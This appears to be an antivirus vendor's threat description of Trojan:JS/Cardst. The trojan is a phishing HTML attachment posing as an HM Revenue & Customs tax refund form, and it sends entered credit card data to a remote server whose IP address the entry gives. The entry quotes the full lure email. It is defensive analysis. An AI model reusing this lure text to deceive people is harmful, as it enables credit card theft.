Threat behavior
Trojan:JS/Cardst is detection for a trojan JavaScript within an HTML file attached to an e-mail message. The HTML attachment is used for phishing purposes and contains a form for entering credit card information with a submit button that sends the collected data to a specific server.
Installation
This trojan script is embedded within HTML and may arrive as an unsolicited e-mail message alleging to be from HM Revenue & Customs (HRMC). Below is an example message:
From: <customers@hmrc.gov.uk>
Date: 10/22/2009 1:54:48 PM
Subject: Please Submit Your Payment Refund.
Attachment: Refund-form.html
Dear Applicant:
We have reviwed your tax return and our calculations of your last years accounts a tax refund of 178.25 is due
Please submit the tax refund request and allow us 3-6 days in order to
process it.
A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after the deadline.
Please submit the form attached to your email in order to complete your tax refund
Best Regards,
HM Revenue & Customs
--------------------------------------------------------------
© Copyright 2009, HM Revenue & Customs UK All rights reserved.
TAX REFUND ID: A29R119
Payload
Sends data to remote server
When a user opens the attached HTML form, the form is displayed in a Web browser with entry fields for entering credit card and personal information with a button labeled "Submit Information". Upon entering data and clicking the button, the form field data is posted to the website "0x4010d38f" (64.16.211.143). At the time of this writing, the site was unavailable.
Additional Information
HRMC is an England-based entity responsible for collecting direct or indirect taxes and revenue. Users that fill in the attached form and submit the information could be at risk of financial loss.
Analysis by Hong Jia
Prevention
